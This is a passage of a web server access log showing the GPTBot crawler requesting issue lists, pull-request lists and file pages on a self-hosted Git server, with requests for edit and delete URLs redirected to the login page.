+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11628] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" +[17/Feb/2026:19:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:13:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:13:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11238] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11644] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 925] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10737] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" +[17/Feb/2026:19:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:13:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:13:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:19:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:19:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:19:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 